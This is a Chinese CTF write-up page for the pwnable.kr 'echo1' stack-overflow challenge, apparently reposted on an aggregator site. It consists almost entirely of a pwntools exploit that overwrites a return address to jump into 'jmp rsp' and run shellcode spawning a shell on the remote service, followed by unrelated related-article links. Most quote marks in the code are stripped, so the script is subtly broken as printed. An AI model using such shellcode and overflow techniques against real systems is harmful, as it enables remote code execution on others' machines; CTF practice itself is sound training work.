pwnable.kr-echo1-Writeup

Posted M4x@10.0.0.55

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了pwnable.kr-echo1-Writeup相关的知识,希望对你有一定的参考价值。

pwnable的echo1,一个栈溢出的漏洞,同样以后再补上分析过程和思路,先放exp

 1 #!/usr/bin/env python
 2 # -*- coding: utf-8 -*-
 3 __Auther__ = M4x
 4 
 5 from pwn import *
 6 context.arch = amd64
 7 context.os = linux
 8 context.log_level = debug
 9 
10 elf = ELF(./echo1)
11 id_addr = elf.symbols[id]
12 #  print hex(id_addr)
13 jmp = asm(jmp rsp)
14 shellcode = asm(shellcraft.sh())
15 
16 #  io = process(‘./echo1‘)
17 io = remote(pwnable.kr, 9010)
18 
19 io.recvuntil(name? : )
20 io.sendline(jmp)
21 
22 io.recvuntil(> )
23 io.sendline(1)
24 
25 payload = A * 40 + p64(id_addr) + shellcode
26 io.sendline(payload)
27 
28 io.interactive()
29 io.close()

 


 

以上是关于pwnable.kr-echo1-Writeup的主要内容,如果未能解决你的问题,请参考以下文章

pwnable.kr-cmd1-Writeup

ciscn_2019_sw_1 Writeup

Java分代垃圾回收机制:年轻代/年老代/持久代(转)

R留学生作业代码代写代编程代编程代编程

IPEX-1代/3代/4代/5代,PCB天线底座,公头,样式及封装尺寸图

JVM 年轻代 老年代 持久代 gc